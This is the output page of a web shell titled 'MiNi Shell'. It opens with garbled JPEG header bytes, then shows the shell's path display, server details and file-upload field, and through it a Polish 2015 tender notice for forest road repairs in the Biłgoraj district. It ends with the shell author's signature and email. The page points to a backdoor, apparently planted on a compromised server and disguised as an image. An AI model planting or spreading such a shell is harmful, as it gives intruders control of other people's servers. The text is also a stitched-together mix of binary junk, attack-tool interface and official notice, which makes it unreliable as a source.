JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150605/82221-N-2015.html

<p class="kh_header"><b>Biłgoraj: Remonty oraz przebudowa dróg leśnych o nawierzchni bitumicznej w Leśnictwach: Bojary, Zagumnie, oraz Ujście (Bukowa - Pęk) na terenie Nadleśnictwa Biłgoraj .</b><br>
<b>Numer ogłoszenia: 82221 - 2015; data zamieszczenia: 05.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe - Nadleśnictwo Biłgoraj , ul. Zamojska 96, 23-400 Biłgoraj, woj. lubelskie, tel. 84 6860028, 6868099, faks 84 6864259.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty oraz przebudowa dróg leśnych o nawierzchni bitumicznej w Leśnictwach: Bojary, Zagumnie, oraz Ujście (Bukowa - Pęk) na terenie Nadleśnictwa Biłgoraj ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są 3 niżej wymienione zadania: 

I.	Remont cząstkowy drogi leśnej o nawierzchni bitumicznej nr inw. 220/651 od km 0+000,00 do km 1+496,30 , oraz dojazdu od km 0+000,00 do km 0+133,50 w Leśnictwie Bojary.
Zakres robót obejmuje:
    Odcinek Nr 1 
     - oczyszczenie nawierzchni 						- 1 197,04 m2 
     - remonty cząstkowe nawierzchni powierzchniowo utrwalonych przy użyciu grysów bazaltowych  
       2-5 i emulsji asfaltowej K1-70 	- 1 789,87 m2 
     - oczyszczenie i skropienie nawierzchni emulsją asfaltową K1-60 	-    269,60 m2 
     - ręczne wyrównanie istniejącej podbudowy mieszanką 
      mineralno-asfaltową 						-      26,96 Mg 
     - powierzchniowe utrwalanie nawierzchni emulsją asfaltową K1-70 
       i kruszywem bazaltowym frakcji 5-8 				-    269,60 m2 

    Odcinek Nr 2 
     - oczyszczenie nawierzchni 					-   113,84 m2 
     - remonty cząstkowe nawierzchni powierzchniowo utrwalonych 
       przy użyciu grysów bazaltowych 2-5 i emulsji asfaltowej K1-70 	-     57,45 m2 

II.	Remont cząstkowy drogi leśnej o nawierzchni bitumicznej od km )+000,00 do 
   km 3+184,30 w Leśnictwie Zagumnie.

Zakres robót obejmuje:

- długość drogi 									-  3 350,00 m 
 -szerokość jezdni  								-         3,20 m  
 -powierzchnia jezdni (warstwa ścieralna grubości 4 cm)				- 10 720,00 m2 
 -utwardzenie pobocze szerokości 0,50 m po wewnętrznej stronie łuków 
  warstwą kruszywa łamanego grubości 10 cm 					-      200,00 m2 
 -liczba mijanek o wymiarach 3,0 x 23,0 ze skosami 1:7 	(11 szt.)			-   1 452,00 m2 
 -frezowanie nawierzchni bitumicznej na szerokości 2,00 m i głębokości do 3 cm 
 -na początku i na końcu odcinka robót (wykonanie wcinki), oraz wybrzuszeń na jezdni - 76,80 m2 
 -frezowanie nawierzchni bitumicznej w pasie szerokości 2,00 m do głębokości 3 cm - (likwidacja progu 
  na styku jezdnia drogi i zjazdy) 				               -      119,00 m2 
-wykonanie nawierzchni szerokości 2,00 m styku jezdni drogi i zjazdów (warstwa ścieralna grubości 4   
 cm) -19,00 m2 	
- wyrównanie deformacji i nierówności istniejącej nawierzchni mieszanką mineralno - asfaltową -         
 15,93 t
-wypełnienie istniejących wyboi, ubytków i wykruszeń nawierzchni mieszanką mineralno - asfaltową 							                                 - 14,38 t
-oczyszczanie rowu z namułu grubości 30 cm wraz z wyprofilowaniem skarp 	-   6 700,00 m
 regulacja poboczy - profilowanie i zagęszczenie (grunt pozyskany z renowacji rowów przydrożnych w   
 ilości 50 % zapotrzebowania) 			                              -      132,33 m3 
-regulacja poboczy - profilowanie i zagęszczenie (grunt Wykonawcy dowieziony środkami transportu  
 kołowego w ilości 50 % zapotrzebowania) 			              -      132,33 m3
- liczba zjazdów na drogi oddziałowe i boczne o szerokości jezdni 3,00 m i poboczy 2 x 0,75 m -  4 szt. 
- wykonanie przepustów O 40 pod zjazdami z rur z tworzywa sztucznego o sztywności obwodowej SN  
 8 z rdzeniem litym (4 szt. x 9,00 m)                                                -       36,00 m
- powierzchnia zjazdów do utwardzenia (grubość warstwy kruszywa 20 cm) 	  -     292,00 m2 
- odmulenie rowu dopływowego i odpływowego po obu stronach przepustu, grubość warstwy namułu 
 30.cm, ciek o szerokości dna 0,40 m 	                                           -       60,00 m
- karczowanie krzaków i podszycia rzadkie					-       0,5445 ha 
- plantowanie skarp i korony nasypów, kategoria gruntu I-III 			-  5 025,00 m2

III.Przebudowa (modernizacja) drogi leśnej o nawierzchni bitumicznej od km 2+200,00 do km 5+550,00 w Leśnictwie Ujscie.

Zakres robót obejmuje:

- długość drogi 									-  3 350,00 m 
-szerokość jezdni 								-         3,20 m  
-powierzchnia jezdni (warstwa ścieralna grubości 4 cm) 				- 10 720,00 m2 
- utwardzenie pobocze szerokości 0,50 m po wewnętrznej stronie łuków  warstwą kruszywa łamanego  
 grubości 10 cm 				            		         -      200,00 m2 
-liczba mijanek o wymiarach 3,0 x 23,0 ze skosami 1:7 	(11 szt.)			 -   1 452,00 m2 
-frezowanie nawierzchni bitumicznej na szerokości 2,00 m i głębokości do 3 cm na początku i na końcu  
 odcinka robót (wykonanie wcinki), oraz wybrzuszeń na jezdni	                 -       76,80 m2 
 -frezowanie nawierzchni bitumicznej w pasie szerokości 2,00 m do głębokości 3 cm  (likwidacja progu  
 na styku jezdnia drogi i zjazdy)  					      -      119,00 m2 	
 -wykonanie nawierzchni szerokości 2,00 m styku jezdni drogi i zjazdów (warstwa ścieralna grubości 4  
 cm)							                      -      119,00 m2  -wyrównanie deformacji i nierówności istniejącej nawierzchni mieszanką mineralno - asfaltową 							                                         - 15,93 t
- wypełnienie istniejących wyboi, ubytków i wykruszeń nawierzchni mieszanką mineralno - asfaltową 							                                - 14,38 t
- oczyszczanie rowu z namułu grubości 30 cm wraz z wyprofilowaniem skarp 	-   6 700,00 m
- regulacja poboczy - profilowanie i zagęszczenie (grunt pozyskany z renowacji rowów przydrożnych w  
 ilości 50 % zapotrzebowania) 			                                  - 132,33 m3 
-regulacja poboczy - profilowanie i zagęszczenie (grunt Wykonawcy dowieziony środkami transportu      kołowego w ilości 50 % zapotrzebowania) 			                  -  132,33 m3
-liczba zjazdów na drogi oddziałowe i boczne o szerokości jezdni 3,00 m i poboczy 2 x 0,75 m 					                                                          - 4 szt. 
-wykonanie przepustów O 40 pod zjazdami z rur z tworzywa sztucznego	o sztywności 	obwodowej SN 8 z rdzeniem litym (4 szt. x 9,00 m) 			-       36,00 m
- powierzchnia zjazdów do utwardzenia (grubość warstwy kruszywa 20 cm)	-     292,00 m2 
- odmulenie rowu dopływowego i odpływowego po obu stronach przepustu, grubość warstwy namułu 
 30.cm, ciek o szerokości dna 0,40 m 			-       60,00 m
-karczowanie krzaków i podszycia rzadkie 				-         0,5445 ha 
- plantowanie skarp i korony nasypów, kategoria gruntu I-III 		-  5 025,00 m2.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.23.31.42-6, 45.23.32.20-7, 45.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Każda oferta musi być zabezpieczona wadium w wysokości - 15.000,00 zł (słownie: piętnaście tysięcy złotych )
2.Wadium może być wniesione w następujących formach:
pieniądzu
poręczeniach   bankowych   lub   poręczeniach   spółdzielczej   kasy  oszczędnościowo  -
kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz.U. z 2007 r. nr 42, poz. 275 z późn. zm.).
3.Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
Zamawiającego nr 74 1020 5385 0000 9202 0028 0842 
z dopiskiem na blankiecie przelewu - Wadium na remonty oraz przebudowę dróg leśnych o nawierzchni bitumicznej w Leśnictwach: Bojary, Zagumnie, oraz Ujście (Bukowa - Pęk) na terenie Nadleśnictwa Biłgoraj .
4.Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
5.Wadium wniesione w pozostałych formach należy w oryginale dołączyć do oferty. Dokument powinien być dołączony do oferty w sposób umożliwiający dokonanie odłączenia i zwrotu oryginału dokumentu bez uszkodzenia oferty. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być złożony w sposób czytelny umożliwiający jego identyfikację (np. złożony wraz z imienną pieczątką lub czytelny z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać nieodwołalne i bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium na zasadach określonych w art. 46 ust. 4a i ust. 5 ustawy Pzp.
6.Wadium wnoszone w pieniądzu musi być wniesione przed upływem terminu składania ofert. Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym zamawiającego. Dowód potwierdzający wniesienie wadium należy dołączyć do oferty. Oferta niezabezpieczona akceptowaną formą wadium zostanie odrzucona.
7.Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z zastrzeżeniem ust.11, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
8.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zawraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego, oraz wniesieniu zabezpieczenia należytego wykonania umowy.
9.Zamawiający zwróci wadium na wniosek wykonawcy, który przed upływem terminu składania ofert wycofał ofertę.
10.Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:

1)odmówił  podpisania  umowy w  sprawie  zamówienia  publicznego  na  warunkach określonych w ofercie,
2)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3)sprawił, że zawarcie umowy stało się niemożliwe z przyczyn leżących po jego stronie.
11.Zamawiający zatrzyma także wadiuwadm wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 Pzp, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń na okoliczność spełnienia warunków udziału w postępowaniu, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie innej omyłki polegającej na niezgodności treści oferty ze SIWZ, niepowodującej istotnych zmian w treści oferty, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
12.Zamawiający zażąda, w wyznaczonym przez siebie terminie, ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie ust. 7powyżej, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania szczególnych uprawnień, natomiast uprawnienia do wykonywania czynności zostaną opisane łącznie z warunkiem dotyczącym osób zdolnych do wykonywania zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia wiedzy i doświadczenia wykonawcy winni udokumentować, że, w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres
prowadzenia działalności jest krótszy, w tym okresie - zrealizowanie co najmniej dwóch robót budowlanych w zakresie budowy, rozbudowy, przebudowy, remontu dróg - o wartości równej lub przekraczającej 250.000,00 zł brutto każda, odpowiednio potwierdzonych, że roboty zostały wykonane w sposób należyty oraz wskazujących, że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-za spełnienie warunku dotyczącego dysponowania narzędziami i urządzeniami
technicznymi niezbędnymi do realizacji zamówienia zamawiający uzna, jeżeli wykonawca
dysponuje co najmniej:
-ciągnikiem kołowym mocy 50 KM,
-ładowarką kołowa 1,25 m3, 
-rozsypywaczem,
-samochodem samowyładowczym do 5 t,
-skrapiarką do bitumu przewoźną 250÷500 dm3,
-skrapiarką do bitumu samojezdną samochodową 5000 dm3,
-szczotką mechaniczna bez ciągnika,
-walcem statycznym samojezdnym 15 t.
-frezarką drogową do nawierzchni bitumicznych z podajnikiem,
-koparką podsiębierną o pojemności łyżki 0,25 m3, oraz 0,40 m3,
-rozkładarką mas bitumicznych 4,50 m,
-równiarką samojezdną mocy 100 KM,
-samochodem dostawczym do 0,9 t,
-spycharką gąsienicowa mocy 75 KM, oraz 100 KM,
-szczotką mechaniczną bez ciągnika,
-ubijakiem spalinowym min. 200 kg,
-walcem statycznym samojezdnym 10 t,
-walcem wibracyjnym samojezdnym 7,5 t.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-za spełnienie warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia zamawiający uzna, jeżeli wykonawca wykaże, że dysponuje co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej w branży drogowej (kierownik budowy). Zamawiający w zakresie uprawnień budowlanych dopuszcza odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12 a oraz innych przepisów ustawy Prawo budowlane ( tekst jednolity: Dz. U. z 2013 r., poz. 1409 z późn. zm.), ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U.z 2008 r., nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje żadnych wymagań,  których spełnienie wykonawca  byłby zobowiązany wykazać w sposób szczególny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - okres bezpłatnej gwarancji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I.Termin wykonania robót objętych niniejszą umową ulegnie zmianie w przypadku: 1) opóźnienia przekazania przez
Zamawiającego placu budowy lub frontu prac, 2) wprowadzenia zmian w dokumentacji technicznej przedmiotu
zamówienia w terminie uniemożliwiającym dotrzymanie terminu umownego wykonania robót, 3) przerw w realizacji
robót, powstałych z przyczyn zależnych od Zamawiającego, 4) zlecenia robót dodatkowych lub zamiennych, jeżeli
terminy ich zlecenia, rodzaj lub zakres, uniemożliwiający dotrzymanie pierwotnego terminu umowy, 5) zaistnienia
przeszkód spowodowanych siłą wyższą tj. zdarzeniem zewnętrznym niemożliwym do przewidzenia i niemożliwym do
zapobieżenia. Za okoliczności siły wyższej strony uznają: powódź, trzęsienia ziemi, działania wojenne, ogłoszenie
stanu wojennego, stanu klęski żywiołowej, 6) zmiany przepisów prawa mających wpływ na termin wykonania robót
lub sposobu prowadzenia robót, 7) warunków atmosferycznych negatywnie wpływających na jakość lub trwałość
wykonania przedmiotu umowy, a w szczególności zalanie terenu wodą, 8) nieprzewidzianych wykopalisk
uniemożliwiających wykonywanie robót, 9) przerw w realizacji robót w przypadku odkrycia niewypałów, niewybuchów,
10) zakazu dalszego prowadzenia robót wynikającego z prawomocnego orzeczenia sądowego lub administracyjnego.
2. Zmiany wynagrodzenia mogą nastąpić również z tytutu: a) zmiany ustawowej stawki podatku od towarów i usług
VAT, b) nie wykonania całkowitego zakresu robót objętych umową, c) wstrzymanie realizacji zadania inwestycyjnego
przez Zamawiającego, d) zmian korzystnych dla Zamawiającego, e) na skutek zmian wynikających z kosztorysu
powykonawczego. 3.Zamawiający dopuszcza zmianę osoby pełniącej funkcję kierownika budowy, pod warunkiem, że
osoba ta będzie posiadał takie same kwalifikacje jak dotychczasowy kierownik budowy lub wyższe. 4. Zamawiający
zastrzega sobie prawo do zmiany osoby pełniącej funkcję inspektora nadzoru inwestorskiego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bilgoraj.lublin.lasy.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 23-400 Biłgoraj , ul.Zamojska 96, pok. nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2015 godzina 09:00, miejsce: 23-400 Biłgoraj, ul.Zamojska 96, sekretariat, pok. nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com